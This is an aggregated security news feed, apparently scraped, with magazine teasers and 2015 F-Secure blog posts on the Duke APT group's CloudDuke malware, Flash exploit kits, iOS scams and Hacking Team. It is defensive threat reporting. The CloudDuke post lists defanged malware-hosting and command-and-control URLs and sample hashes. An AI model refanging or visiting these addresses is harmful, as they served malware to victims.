Retail Budgets at Risk: Price-Scraping and Fraudulent Bot Attacks Are on The Rise

Competition in the eCommerce industry is becoming increasingly rivalled. As consumers turn to online stores, more and more retailers are making the jump themselves and pivoting towards digital. Joining such...

The post Retail Budgets at Risk: Price-Scraping and Fraudulent Bot Attacks Are on The Rise appeared first on Cyber Defense Magazine.

Read More
Effortless Cloud Security: A Beginner’s Checklist for a Safer Cloud Environment
Effortless Cloud Security: A Beginner’s Checklist for a Safer Cloud Environment

In the past few years, the world has embraced a new era of AI, introducing an array of security tools that leverage advanced technologies to automate deployments, conduct real-time scanning,...

The post Effortless Cloud Security: A Beginner’s Checklist for a Safer Cloud Environment appeared first on Cyber Defense Magazine.

Read More
Preventing Costly Data Breaches Requires a Robust Physical and Digital Security Posture
Preventing Costly Data Breaches Requires a Robust Physical and Digital Security Posture

Independent market research firm Vanson Bourne recently conducted a study querying 1,000 senior IT decision-makers across the US and EMEA regarding their organizations’ security policies for reducing and preventing data...

The post Preventing Costly Data Breaches Requires a Robust Physical and Digital Security Posture appeared first on Cyber Defense Magazine.

Read More
Post Quantum Threats – The Encryption Apocalypse That Isn’t
Post Quantum Threats – The Encryption Apocalypse That Isn’t

Preface RSA Conference just wrapped up, and while phrases like “We are an Agentic AI solution for XYZ,” “AI in Cybersecurity,” and “Risks of AI Adoption” echoed across the expo...

The post Post Quantum Threats – The Encryption Apocalypse That Isn’t appeared first on Cyber Defense Magazine.

Read More
There Are Plenty of Phish in The Sea: Here’s How to Avoid Them
There Are Plenty of Phish in The Sea: Here’s How to Avoid Them

When was the last time you revisited your organization’s email security practices? Is your current software up to the task of defending your data against newer and more sophisticated cyber...

The post There Are Plenty of Phish in The Sea: Here’s How to Avoid Them appeared first on Cyber Defense Magazine.

Read More
Neural Hijacking: Is Your Brain Making Security Decisions Without You?
Neural Hijacking: Is Your Brain Making Security Decisions Without You?

Introduction: The Battlefield Inside Your Head In cybersecurity, we master firewalls and encryption. But are we neglecting the most critical vulnerability? The human brain. Every day, you make thousands of split-second...

The post Neural Hijacking: Is Your Brain Making Security Decisions Without You? appeared first on Cyber Defense Magazine.

Read More
Multifaceted Cyber-Attacks Require a Unified Defense Approach
Multifaceted Cyber-Attacks Require a Unified Defense Approach

Gone are the days of attacks hitting a single product or vulnerability. Today, we’re seeing the increasing use of multi-vector attacks and multi-stage approaches. For example, a DDoS attack in...

The post Multifaceted Cyber-Attacks Require a Unified Defense Approach appeared first on Cyber Defense Magazine.

Read More
Mind the Middle
Mind the Middle

In an era where digital threats can cripple a business overnight, where threat actors can use AI to customize and automate attacks at scale, and where enterprises face constant budget...

The post Mind the Middle appeared first on Cyber Defense Magazine.

Read More
Legacy Solutions Have Become a Cyber Defense Problem
Legacy Solutions Have Become a Cyber Defense Problem

The cyber defense community is at a crossroads that is magnified by cyber criminals’ adoption of AI and ransomware-as-a-service. With year-after-year of the IBM Cost of Data Breach report showing...

The post Legacy Solutions Have Become a Cyber Defense Problem appeared first on Cyber Defense Magazine.

Read More
CVE-2025-53770 & CVE-2025-53771: Critical On-Prem SharePoint Vulnerabilities
CVE-2025-53770 & CVE-2025-53771: Critical On-Prem SharePoint Vulnerabilities

Cybereason is actively investigating exploitation attempts of these vulnerabilities. Check the Cybereason blog for additional updates. 
 

Key Takeaways

  • Two zero-day vulnerabilities discovered in on-premise Microsoft SharePoint servers, tracked as CVE‑2025‑53770 and CVE‑2025‑53771.
  • Affected versions include: Subscription Edition – KB5002768, SharePoint 2019 – KB5002754, SharePoint 2016 – KB5002760. 
  • If exploited, these vulnerabilities could allow for remote code execution (RCE). 
  • Cybereason has observed ongoing active exploitation attempts of these vulnerabilities through our Global SOC monitoring. 
  • With this exploit, we recommend taking an “assume compromised” posture, immediately patching impacted versions, and conducting incident response historical look back. 

Read More
BlackSuit: A Hybrid Approach with Data Exfiltration and Encryption
BlackSuit: A Hybrid Approach with Data Exfiltration and Encryption

Cybereason Security Services issue Threat Analysis reports to inform on impacting threats. The Threat Analysis reports investigate these threats and provide practical recommendations for protecting against them.

Read More
Deploying NetSupport RAT via WordPress & ClickFix
Deploying NetSupport RAT via WordPress & ClickFix

In May 2025, Cybereason Global Security Operations Center (GSOC) detected that threat actors have been hosting malicious WordPress websites to deliver malicious versions of the legitimate NetSupport Manager Remote Access Tool (RAT). 

Read More
Introducing the Cybereason TTP Briefing: Frontline Threat Intelligence Insights
Introducing the Cybereason TTP Briefing: Frontline Threat Intelligence Insights

Gain insight into the latest attack trends, techniques, and procedures our Incident Response experts are actively facing with the brand new TTP Briefing, a report built on frontline threat intelligence from our global incident response (IR) investigations, enriched by noteworthy detections from our SOC. 

Read More
Ransomware Gangs Collapse as Qilin Seizes Control
Ransomware Gangs Collapse as Qilin Seizes Control

The ransomware landscape is undergoing a turbulent realignment, marked by collapses, takeovers, and unexpected internal betrayals.

Read More
Copyright Phishing Lures Leading to Rhadamanthys Stealer Now Targeting Europe
Copyright Phishing Lures Leading to Rhadamanthys Stealer Now Targeting Europe

Cybereason issues Threat Alerts to inform customers of emerging impacting threats, critical vulnerabilities and attacker campaigns. Cybereason Threat Alerts summarize these threats and provide practical recommendations for protecting against them.

Read More
Genesis Market - Malicious Browser Extension
Genesis Market - Malicious Browser Extension

Cybereason GSOC has identified a malware infection exhibiting strong similarities to the previously reported Genesis Market malicious campaign that was dismantled by law enforcement in early 2023.

Read More
CVE-2025-32433: Unauthenticated RCE Vulnerability in Erlang/OTP’s SSH Implementation
CVE-2025-32433: Unauthenticated RCE Vulnerability in Erlang/OTP’s SSH Implementation

Key Takeaways

  • A critical vulnerability has been discovered in Erlang/OTP, tracked as CVE-2025-32433,  and has a CVSS score of 10 (critical). 
  • This critical remote code execution (RCE) vulnerability affects the SSH server within the Erlang/OTP software platform.
  • This vulnerability allows unauthenticated attackers to gain full system access by sending crafted SSH packets before any login or credentials are provided. 
  • Systems running Erlang/OTP’s native SSH server are at risk and may be embedded in telecom, IoT, cloud platforms, databases, etc.
  • We recommend patching impacted systems immediately. 

Read More
From Shadow to Spotlight: The Evolution of LummaStealer and Its Hidden Secrets
From Shadow to Spotlight: The Evolution of LummaStealer and Its Hidden Secrets

This article is a continuation of the previous research published on the malware LummaStealer: "Your Data Is Under New Lummanagement: The Rise of LummaStealer".

Read More
A Class Above: Expert Support for Data Breach Class Action Defense
A Class Above: Expert Support for Data Breach Class Action Defense

Between 2022 and 2024, data breach-related class actions in the United States surged by over 146%, with the top 10 settlements in 2024 averaging 15% higher than in 2023. As organizations grapple with increasingly aggressive litigation stemming from cybersecurity incidents, class action lawsuits have become a major risk vector—one that now rivals the breach itself in terms of financial, operational, and reputational impact, underscoring the importance of both proactive cybersecurity posture and a strong defensive strategy in litigation. Whether it’s demonstrating reasonable security practices or disputing claims of harm resulting from cybersecurity incidents, the involvement of technical experts has become critical.

Read More
How to spot a holiday shopping scam: Fake deals, trick surveys & bogus gift cards
How to spot a holiday shopping scam: Fake deals, trick surveys & bogus gift cards

Scammers, fraudsters, and phishers take advantage of every season. But the holiday shopping season - which includes Black Friday, Cyber Monday, and Christmas - may be their favorite.

As retailers rush to capitalize on what is generally their most profitable time of year, they will generally flood email boxes with great offers that are often time sensitive and may even seem too-good-to-be-true. Meanwhile, consumers also feel the urgency to get their shopping done, along with the stresses of work and family. Add in the financial pressure of an inflationary economy and the likelihood of making a quick mistake keeps increasing. Read on for some simple yet effective ways to ruin the scammers' fun as you celebrate the season of giving.

Read More
Soon�
Soon�

Posted by Sean @ 12:52 GMT


Our "construction project" is progressing nicely.

A work in progress

And it should resolve this…

Mobile usability issues

Fix mobile usability issues?

Translation: your site doesn't help us sell more Android phones and ads.

But whatever, the "issues" should be fixed soon enough.




On 18/08/15 At 12:52 PM

Read More
Work In Progress
Work In Progress

Posted by Sean @ 13:25 GMT


Regular readers will have noticed it's been slow here of late.

Under Construction
Under Construction

We're finally undertaking an upgrade from Greymatter 1.7.3. This may be the world's oldest Greymatter blog… that will now change.

More info coming soon.

In the meantime, you can still catch us on Twitter.




On 13/08/15 At 01:25 PM

Read More
"IOS Crash Report" Update: Safari Adds Block Feature

Posted by Sean @ 09:53 GMT


Ask, and sometimes, you shall receive.

Last Friday, we wrote about call center scammers targeting iOS. And today, Apple released a new (beta) feature that should help.

Apple released iOS 9 Public Beta 2:

iOS 9 Public Beta 2, Install

And it appears that one of Safari's new features allows people to block fraud-focused JavaScript.

iOS 9 Public, Safari Block Alerts

We tested a scam-site and after a few attempts to dismiss the JavaScript dialog, Safari included a prompt to "Block Alerts". We were then easily able to close the page.

Kudos Apple! Looking forward to seeing this in iOS 9's general release.

Big hat tip to Rosyna Keller.




On 23/07/15 At 09:53 AM

Read More
Duke APT group's latest tools: cloud services and Linux support
Duke APT group's latest tools: cloud services and Linux support

Posted by Artturi @ 11:59 GMT


Recent weeks have seen the outing of two new additions to the Duke group's toolset, SeaDuke and CloudDuke. Of these, SeaDuke is a simple trojan made interesting by the fact that it's written in Python. And even more curiously, SeaDuke, with its built-in support for both Windows and Linux, is the first cross-platform malware we have observed from the Duke group. While SeaDuke is a single - albeit cross-platform - trojan, CloudDuke appears to be an entire toolset of malware components, or "solutions" as the Duke group apparently calls them. These components include a unique loader, downloader, and not one but two different trojan components. CloudDuke also greatly expands on the Duke group's usage of cloud storage services, specifically Microsoft's OneDrive, as a channel for both command and control as well as the exfiltration of stolen data. Finally, some of the recent CloudDuke spear-phishing campaigns have born a striking resemblance to CozyDuke spear-phishing campaigns from a year ago.

Linux support added with the cross-platform SeaDuke malware

Last week, both Symantec and Palo Alto Networks published research on SeaDuke, a newer addition to the arsenal of trojans being used by the Duke group. While older malware by the Duke group has always been written with a combination of the C and C++ programming languages as well as assembly language, SeaDuke is peculiarly written in Python with multiple layers of obfuscation. This Python code is usually then compiled into Windows executables using py2exe or pyinstaller. However, the Python code itself has been designed to work on both Windows and Linux. We therefore suspect, that the Duke group is also using the same SeaDuke Python code to target Linux victims. This is the first time we have seen the Duke group employ malware to target Linux platforms.

seaduke_crossplatform (39k image)
An example of the cross-platform support found in SeaDuke.

A new set of solutions with the CloudDuke malware toolset

Last week, we also saw Palo Alto Networks and Kaspersky Labs publish research on malware components they respectively called MiniDionis and CloudLook. MiniDionis and CloudLook are both components of a larger malware toolset we call CloudDuke. This toolset consists of malware components that provide varying functionality while partially relying on a shared code framework and always using the same loader. Based on PDB strings found in the samples, the malware authors refer to the CloudDuke components as "solutions" with names such as "DropperSolution", "BastionSolution" and "OneDriveSolution". A list of PDB strings we have observed is below:

� C:\DropperSolution\Droppers\Projects\Drop_v2\Release\Drop_v2.pdb
� c:\BastionSolution\Shells\Projects\miniDionis4\miniDionis\obj\Release\miniDionis.pdb
� c:\BastionSolution\Shells\Projects\miniDionis2\miniDionis\obj\Release\miniDionis.pdb
� c:\OneDriveSolution\Shells\Projects\OneDrive2\OneDrive\obj\x64\Release\OneDrive.pdb

The first of the CloudDuke components we have observed is a downloader internally called "DropperSolution". The purpose of the downloader is to download and execute additional malware on the victim's system. In most observed cases, the downloader will attempt to connect to a compromised website to download an encrypted malicious payload which the downloader will decrypt and execute. Depending on the way the downloader has been configured, in some cases it may first attempt to log in to Microsoft's cloud storage service OneDrive and retrieve the payload from there. If no payload is available from OneDrive, the downloader will revert to the previously mentioned method of downloading from compromised websites.

We have also observed two distinct trojan components in the CloudDuke toolset. The first of these, internally called "BastionSolution", is the trojan that Palo Alto Networks described in their research into "MiniDionis". Interestingly, BastionSolution appears to functionally be an exact copy of SeaDuke with the only real difference being the choice of programming language. BastionSolution also makes significant use of a code framework that is apparently internally called "Z". This framework provides classes for functionality such as encryption, compression, randomization and network communications.

bastion_z (12k image)
A list of classes in the BastionSolution trojan, including multiple classes from the "Z" framework.

Classes from the same "Z" framework, such as the encryption and randomization classes, are also used by the second trojan component of the CloudDuke toolset. This second component, internally called "OneDriveSolution", is especially interesting because it relies on Microsoft's cloud storage service OneDrive as its command and control channel. To achieve this, OneDriveSolution will attempt to log into OneDrive with a preconfigured username and password. If successful, OneDriveSolution will then proceed to copy data from the victim's computer to the OneDrive account. It will also search the OneDrive account for files containing commands for the malware to execute.

onedrive_z (7k image)
A list of classes in the OneDriveSolution trojan, including multiple classes from the "Z" framework.

All of the CloudDuke "solutions" use the same loader, a piece of code whose primary purpose is to decrypt the embedded, encrypted solution, load it in memory and execute it. The Duke group has often employed loaders for their malware but unlike the previous loaders they have used, the CloudDuke loader is much more versatile with support for multiple methods of loading and executing the final payload as well as the ability to write to disk and execute additional malware components.

CloudDuke spear-phishing campaigns and similarities with CozyDuke

CloudDuke has recently been spread via spear-phishing emails with targets reportedly including organizations such as the US Department of Defense. These spear-phising emails have contained links to compromised websites hosting zip archives that contain CloudDuke-laden executables. In most cases, executing these executables will have resulted in two additional files being written to the victim's hard disk. The first of these files has been a decoy, such as an audio file or a PDF file while the second one has been a CloudDuke loader embedding a CloudDuke downloader, the so-called "DropperSolution". In these cases, the victim has been presented with the decoy file while in the background the downloader has proceeded to download and execute one of the CloudDuke trojans, "OneDriveSolution" or "BastionSolution".

decoy_ndi_small (63k image)
Example of one of the decoy documents employed in the CloudDuke spear-phishing campaigns. It has apparently been copied by the attackers from here.

Interestingly, however, some of the other CloudDuke spear-phishing campaigns we have observed this July have born a striking resemblance to CozyDuke spear-phishing campaigns seen almost exactly a year ago, in the beginning of July 2014. In both spear-phishing campaigns, the decoy document has been the exact same PDF file, a "US letter fax test page" (28d29c702fdf3c16f27b33f3e32687dd82185e8b). Similarly, the URLs hosting the malicious files have, in both campaigns, purported to be related to eFaxes. It is also interesting to note, that in the case of the CozyDuke-inspired CloudDuke spear-phishing campaign, the downloading and execution of the malicious archive linked to in the emails has not resulted in the execution of the CloudDuke downloader but in the execution of the "BastionSolution" component thereby skipping one step from the process described for the other CloudDuke spear-phishing campaigns.

decoy_fax (72k image)
The "US letter fax test page" decoy employed in both CloudDuke and CozyDuke spear-phishing campaigns.

Increasingly using cloud services to evade detection

CloudDuke is not the first time we have observed the Duke group use cloud services in general and Microsoft OneDrive specifically as part of their operations. Earlier this spring we released research on CozyDuke where we mentioned observing CozyDuke sometimes either directly use a OneDrive account to exfiltrate stolen data or alternatively CozyDuke downloading Visual Basic scripts that would copy stolen files to a OneDrive account and sometimes even retrieve files containing additional commands from the same OneDrive account.

In these previous cases the Duke group has only used OneDrive as a secondary communication channel but still relied on more traditional C&C channels for most of their actions. It is therefore interesting to note that CloudDuke actually enables the Duke group to rely solely on OneDrive for every step of their operation from downloading the actual trojan, passing commands to the trojan and finally exfiltrating stolen data.

By relying solely on 3rd party web services, such as OneDrive, as their command and control channel, we believe the Duke group is trying to better evade detection. Large amounts of data being transferred from an organization's network to an unknown web server easily raises suspicions. However, data being transferred to a popular cloud storage service is normal. What better way for an attacker to surreptitiously transfer large amounts of stolen data than the same way people are transferring that same data every day for legitimate reasons. (Coincidentally, the implications of 3rd party web services being used as command and control channels is also the subject of an upcoming talk at the VirusBulletin 2015 conference).

Directing limited resources towards evading detection and staying ahead of defenders

Developing even a single multipurpose malware toolset, never mind many, requires time and resources. Therefore it seems logical to attempt to reuse code such as supporting frameworks between different toolsets. The Duke group, however, appear to have taken this a step further with SeaDuke and the CloudDuke component BastionSolution, by rewriting the same code in multiple programming languages. This has the obvious benefits of saving time and resources by providing two malware toolsets, that while similar on the inside, appear completely different on the outside. This way, the discovery of one toolset does not immediately lead to the discovery of the second toolset.

The Duke group, long suspected of ties to the Russian state, have been running their espionage operation for an unusually long time and - especially lately - with unusual brazenness. These latest CloudDuke and SeaDuke campaigns appear to be a clear sign that the Duke's are not planning to stop any time soon.

Research and post by Artturi (@lehtior2)

F-Secure detects CloudDuke as Trojan:W32/CloudDuke.B and Trojan:W64/CloudDuke.B

Samples:

04299c0b549d4a46154e0a754dda2bc9e43dff76
2f53bfcd2016d506674d0a05852318f9e8188ee1
317bde14307d8777d613280546f47dd0ce54f95b
476099ea132bf16fa96a5f618cb44f87446e3b02
4800d67ea326e6d037198abd3d95f4ed59449313
52d44e936388b77a0afdb21b099cf83ed6cbaa6f
6a3c2ad9919ad09ef6cdffc80940286814a0aa2c
78fbdfa6ba2b1e3c8537be48d9efc0c47f417f3c
9f5b46ee0591d3f942ccaa9c950a8bff94aa7a0f
bfe26837da22f21451f0416aa9d241f98ff1c0f8
c16529dbc2987be3ac628b9b413106e5749999ed
cc15924d37e36060faa405e5fa8f6ca15a3cace2
dea6e89e36cf5a4a216e324983cc0b8f6c58eaa8
e33e6346da14931735e73f544949a57377c6b4a0
ed0cf362c0a9de96ce49c841aa55997b4777b326
f54f4e46f5f933a96650ca5123a4c41e115a9f61
f97c5e8d018207b1d546501fe2036adfbf774cfd

Compromised servers used for command and control:

hxxps://cognimuse.cs.ntua.gr/search.php
hxxps://portal.sbn.co.th/rss.php
hxxps://97.75.120.45/news/archive.php
hxxps://portal.sbn.co.th/rss.php
hxxps://58.80.109.59/plugins/search.php

Compromised websites used to host CloudDuke:

hxxp://flockfilmseries.com/eFax/incoming/5442.ZIP
hxxp://www.recordsmanagementservices.com/eFax/incoming/150721/5442.ZIP
hxxp://files.counseling.org/eFax/incoming/150721/5442.ZIP




On 22/07/15 At 11:59 AM

Read More
'Zero Days', The Documentary
'Zero Days', The Documentary

Posted by Mikko @ 12:40 GMT


VPRO (the Dutch public broadcasting organization) produced a 45-minute documentary about hacking and the trade of zero days. The documentary has now been released in English on YouTube.



The documentary features Charlie Miller, Joshua Corman, Katie Moussouris, Ronald Prins, Dan Tentler, Eric Rabe (of Hacking Team), Felix Lindner, Rodrigo Branco, Ben Nagy, The Grugq, and many others.




On 20/07/15 At 12:40 PM

Read More
IOS Crash Report: Blocking
IOS Crash Report: Blocking "Pop-Ups" Doesn't Really Help

Posted by Sean @ 10:15 GMT


The Telegraph published an article on Thursday about a scam targeting iOS users. Here's the gist: scammers are using JavaScript generated dialogs to display warnings of so-called "IOS Crash" reports prompting people to call for tech support. Near the end of the Telegraph's article, the following advice is offered:

"To prevent the issue happening again, go to Settings -> Safari -> Block Pop-ups."

Unfortunately, this advice is incorrect. And perhaps even more unfortunately, some security and tech pundits are now repeating the bad advice on numerous websites. How do we know the advice is wrong? Because we actually tested it…

First of all, this "IOS Crash Report" scam is a variation of the technical support scam, cases of which have been documented as early as 2008. In the past, cold-calls originated directly from call centers in India. But more recently, web-based lures are used to prompt potential victims into contacting the scammers.

A Google Search returns several live scam sites with this text:

"Due to a third party application in your phone, IOS is crashed."

Here's one of the sites as viewed with iOS Safari on an iPad:

iosclean.com

Safari's "Fraudulent Website Warning" and "Block Pop-ups" features didn't prevent the page from loading.

What looks like a pop-up on the image above is actually a JavaScript generated dialog. One which will continuously re-spawn itself and can be very difficult to dismiss. Turning off JavaScript in Safari is the quickest way to regain control. Unfortunately, leaving JavaScript disabled will significantly impact a large number of legitimate websites.

Here's the same site as viewed with Google Chrome for Windows:

Prevent this page from creating additional dialogs

Notice the additional text in the image above: prevent this page from creating additional dialogs. Current versions of Chrome and Firefox (for Windows, at least) will inject this option into re-spawning dialogs, allowing the user to break the loop. Sadly, Internet Explorer and Safari do not. (We tested with IE for Windows / Windows Phone, and iOS Safari.)

Wouldn't be great if all browsers supported this prevention feature?

Yeah, we think so, too.

But it's not just browsers, apps with browser functionality can also be affected.

Here's an example of a JavaScript dialog displayed via Cydia.

error1014.com

The end of the Telegraph's article included the following advice from City of London police:

"Never give your iCloud username and password or your bank details to someone over the phone."

Indeed! Giving somebody your iCloud password could quickly turn a support scam into a data hijacking and extortion scheme. We attempted to call several of the scammer telephone numbers to see if they would ask for our iCloud credentials — only to discover that the numbers we tried are currently not in service.

Hopefully they stay that way. (They won't.)




On 17/07/15 At 10:15 AM

Read More
Hacking Team 0-day Flash Wave with Exploit Kits
Hacking Team 0-day Flash Wave with Exploit Kits

Posted by Patricia @ 12:29 GMT


After Hacking Team was compromised, a lot of information were publicly disclosed beginning 5th of July, particularly its business clients and a zero-day vulnerability for the Adobe Flash Player that they have been using.

Since the info about the first zero-day was made freely available, we knew attackers would swiftly move into using it. As expected, the flash exploit was integrated into exploit kits such as Angler, Magnitude, Nuclear, Neutrino, Rig, and HanJuan as reported by Kafeine.

Based on our telemetry, there was a rise in Flash exploits beginning 6th and continued until 9th.

overall_stats (11k image)


Here are the stats for each exploit kit:

ek_stats (27k image)


The security advisory for CVE-2015-5119 zero-day was released on 7th July and the patch was made available on 8th. So the hits started to decline about two days after the patch.

But just when people have started updating their systems, there was yet another spike from the Angler flash exploit hits:

weekend_wave_stats (22k image)


Apparently, two more flash vulnerabilities, CVE-2015-5122 and CVE-2015-5123, were discovered. These vulnerabilities are still waiting to be patched. According to Kafeine, one of the two vulnerabilities were added into the Angler exploit kit.

As a side note related to Angler exploit kit, if you noticed in the second chart above, Angler and HanJuan share the same statistics. This was due to the fact that our detections for Angler Flash exploits were also hitting on HanJuan Flash exploits.

We have verified this after discovering that there was a different URL pattern being detected by Angler:

angler_vs_hanjuan_urlpattern (9k image)


We looked at the flash exploit used by both kits, and the two are very much identical.

Angler Flash Exploit:

anglerek_ht0d_3 (26k image)


HanJuan Flash Exploit:

hanjuanek_ht0d_3 (23k image)


There were already speculations that there seem to be strong connections between the actors behind the two exploits kits. For example, both have used �fileless� delivery of payload and even similar encryption methods. Perhaps at some point we will see HanJuan supporting this new flash 0 day as well.

In the meantime, since there hasn�t been a patch out yet for these new ones, our users remain protected from the effects of the exploit kits through Browsing Protection as well as these detections:

Exploit:SWF/AnglerEK.L
Exploit:SWF/NeutrinoEK.C
Exploit:SWF/NeutrinoEK.D
Exploit:SWF/NuclearEK.H
Exploit:SWF/NuclearEK.J
Exploit:SWF/Salama.H
Exploit:SWF/Salama.R
Exploit:JS/AnglerEK.D
Exploit:JS/NuclearEK.I
Exploit:JS/MagnitudeEK.A

UPDATE: Adobe has released patches for the recent two vulnerabilities: CVE-2015-5122 and CVE-2015-5123. Users are recommended to update to the latest version of Adobe Flash Player.






On 13/07/15 At 12:29 PM

Read More
The Trusted Internet: Who governs who gets to buy spyware from surveillance software companies?
The Trusted Internet: Who governs who gets to buy spyware from surveillance software companies?

Posted by FSLabs @ 02:31 GMT


When hackers get hacked, that's when secrets are uncovered. On July 5th, Italian-based surveillance technology company Hacking Team was hacked. The hackers released a 400GB torrent file with internal documents, source code, and emails to the public - including the company's client list of close to 60 customers.

The list included countries such as Sudan, Kazakhstan and Saudi Arabia - despite official company denials of doing business with oppressive regimes. The leaked documents strongly implied that in the South-East Asian region, government agencies from Singapore, Thailand and Malaysia had purchased their most advanced spyware, referred to as a Remote Control System (RCS).

According to security researchers Citizen Lab, this spyware is extraordinarily intrusive, with the ability to turn on microphone and cameras on mobile devices, intercept Skype and instant messages, and use an anonymizer network of proxy servers to prevent harvested information from being traced back to the command and control servers.

Based on images of the client list posted to pastebin the software was purchased in Malaysia by the Malaysia Anti-Corruption Commission (MACC), Malaysia Intelligence (MI) and the Prime Minister's Office (PMO):

hacking_team_client_list (86k image)

Additional images of leaked invoices posted to medium.com indicated the spyware was sold through a locally-based Malaysian company named Miliserv Technologies (M) Sdb Bhd (registered with the Ministry of Finance Malaysia), which specializes in providing digital forensics, intelligent gathering and public security services:

hacking_team_hack_1 (95k image)

hacking_team_hack_2 (72k image)

Why the Prime Minister's Office would need surveillance software remains puzzling. Mind you, professional grade spyware ain't cheap - a license upgrade could cost you MYR400, 000 and maintenance renewal will set you back about MYR160,000.

According to reports of the incident in Malaysian alternative media, Malaysian government agencies have probably been using the spyware even before discovery of the FinFisher malware that was detected in the run-up to the 2013 General Elections.

Coincidentally, Malaysia has also been the frequent host of the annual ISS World Asia tradeshow, where companies promote their arsenal of 'lawful' surveillance software to law enforcement agencies, telco service provider or government employees. During the 2014 event, the Hacking Team was present and the associate lead sponsor of the event.

MiliServ Technologies is currently involved in the upcoming 2015 ISS World Asia in Kuala Lumpur. The event is invitation-only � though it may be interesting to see if Hacking Team will make it there this year.


Post by – Su Gim




On 08/07/15 At 02:31 AM

Read More
Problematic Wassenaar Definitions
Problematic Wassenaar Definitions

Posted by Sean @ 13:25 GMT


The Wassenaar Arrangement, a multilateral export control regime, defines "intrusion software" as software specially designed or modified to avoid detection by monitoring tools, or to defeat protective countermeasures, of a computer or network capable device. Intrusion software is used to: extract data or information, or to modify system or user data; or to modify the standard execution path of a program or process in order to allow the execution of externally provided instructions.

Wassenaar states that monitoring tools are software or hardware devices that monitor system behaviours or processes running on a device. This includes antivirus (AV) products, end point security products, Personal Security Products (PSP), Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS) or firewalls.

Wassenaar Arrangement definitions
(Source)


So… what we at F-Secure (and the rest of the antivirus industry) call "malware" appears to easily fit Wassenaar's definition of intrusion software.

Why is this interesting?

Well, the US Bureau of Industry and Security (BIS), part of the US Department of Commerce, has proposed updating its rules to require a license for the export of intrusion software.

And according to the Dept of Commerce, "an export" is –any– item that is sent from the United States to a foreign destination. "Items" include among other things, software and technology.

The Paradox

So… if malware is intrusion software, and any item is an export, how exactly are US-based customers supposed to submit a malware sample to their European antivirus vendor? Seriously, customers send us zero-day using malware all the time. Not to mention the samples that we routinely exchange with other trusted AV vendors from around the globe.

Unintended Consequences

The text associated with the BIS proposal says the scope includes penetration testing products that use intrusion software in what looks like an attempt to limit "hacking" tools, but there is nothing about what is excluded from the scope. So the BIS might not intend to limit customers from uploading malware samples to their AV vendor, but that could be the effect if this new rule is adopted and arbitrarily enforced. Or else it could just force people to operate in a legal limbo. Is that what we want?

The BIS is taking comments until July 20th.




On 09/06/15 At 01:25 PM

Read More
Found Item: UK Wi-Fi Law?
Found Item: UK Wi-Fi Law?

Posted by Sean @ 13:27 GMT


I visited the UK last Thursday, found a coffee shop offering "free" Wi-Fi, and read this…

"UK Law states that we must know who is using our Wi-Fi at all times."

Now I'm not a lawyer — but that seems like quite the disingenuous claim.

_WalkinWiFi

Mobile number, post code, and date of birth??

I wonder how many people fall for this type of malarkey.

Post by — @Sean




On 08/06/15 At 01:27 PM

Read More
SMS Exploit Messages
SMS Exploit Messages

Posted by Sean @ 13:56 GMT


There's an iOS vulnerability affecting iPhone, iPad, and even Apple Watch that allows for a denial of service.

Crashing a phone with an SMS? That's so 2008.


S60 SMS Exploit Messages

Unlike 2008, this time kids are reportedly using the vulnerability to harass others.

Apple is working on a security update. But unfortunately… that update very likely won't be available for older iPhones.

Updated to add:

Here's the "Effective Power" exploit crashing an iPhone 6:


Effective Power Unicode iOS hack on iPhone 6

And this… is Effective Power crashing the iOS Twitter app:


Effective Power Unicode iOS hack vs Twitter




On 28/05/15 At 01:56 PM

Read More
Ransomware Spam E-Mails Targeting Users in Italy and Spain
Ransomware Spam E-Mails Targeting Users in Italy and Spain

Posted by FSLabs @ 03:17 GMT


In the past few days, we received some cases from our customers in Italy and Spain, regarding malicious spam e-mails that pointed to Cryptowall or Cryptolocker ransomware.

The spam e-mails pretended to come from a courier/postal service, regarding a parcel that was waiting to be collected. The e-mails offer a link to track that parcel online:

crypt_email (104k image)

When we did the initial investigation of the e-mails from our standard test system, the link redirected to Google:

crypt_email_redirect_italy (187k image)

So, no malicious behavior? Well, we noted that the first two URLs were PHP. Since PHP code is executed on the server side, not locally on the client, it is possible that the servers were 'deciding' whether to redirect the user to Google or to serve malicious content, based on some preset conditions.

Since this particular spam e-mail is written in Italian - perhaps only a customer based in Italy would be able to see the malicious payload? Fortunately, we have Freedome, so we can travel to Italy for a little while to experiment.

So we turned on Freedome, set the location to Milan and clicked the link in the e-mail again:

crypt_email_mal_italy (302k image)

Now we see the bad stuff. If the user is (or appears to be) located in Italy, the server will redirect them to a malicious file hosted on a cloud storage server.

The e-mail spam sent to Spanish users is similar, though in those cases, a CAPTCHA challenge is included to make the site seem more authentic. If the link in the e-mail is clicked by a user located outside Spain, again we end up in Google:

crypt_email_redirect_spain (74k image)

If the site is visited instead from an Spanish IP, we get to the CAPTCHA screen:

crypt_email_target_spain (57k image)

And then to the malware itself:

crypt_email_mal_spain (313k image)

This spam campaign doesn't use any exploits (so far), just old-fashioned social engineering; infection only occurs if the user manually downloads and executes the files offered on the malicious URLs. For our customers, the URLs are blocked and the files are detected.

(malware SHA1s: 483be8273333c83d904bfa30165ef396fde99bf2, 295042c167b278733b10b8f7ba1cb939bff3cb38)

Post by — Victor




On 19/05/15 At 03:17 AM

Read More
Mac Hack Demonstration
Mac Hack Demonstration

Posted by Sean @ 12:46 GMT


Securing your SSH password is very important. Otherwise, you might be pwned by a little girl with her Raspberry Pi.

Kids hack their Dad's computer on her Raspberry Pi

Don't worry, it's an authorized hack, she asked her mom for permission.




On 15/05/15 At 12:46 PM

Read More
Email Security Considerations for Microsoft 365 Users
Email Security Considerations for Microsoft 365 Users

The post Email Security Considerations for Microsoft 365 Users appeared first on GreatHorn.

Read More
Email Security Considerations for Google Workspace Users
Email Security Considerations for Google Workspace Users

The post Email Security Considerations for Google Workspace Users appeared first on GreatHorn.

Read More
Show the Value of Your Email Security Solutions: Don’t Just Measure Detection Rates
Show the Value of Your Email Security Solutions: Don’t Just Measure Detection Rates

The post Show the Value of Your Email Security Solutions: Don’t Just Measure Detection Rates appeared first on GreatHorn.

Read More
Universities and Colleges Face Multi-faceted Email Security Challenges
Universities and Colleges Face Multi-faceted Email Security Challenges

The post Universities and Colleges Face Multi-faceted Email Security Challenges appeared first on GreatHorn.

Read More
Spam vs Phish: The Problem with User-Reported Phish Buttons
Spam vs Phish: The Problem with User-Reported Phish Buttons

The post Spam vs Phish: The Problem with User-Reported Phish Buttons appeared first on GreatHorn.

Read More
Phishing for Google Impersonation Attacks
Phishing for Google Impersonation Attacks

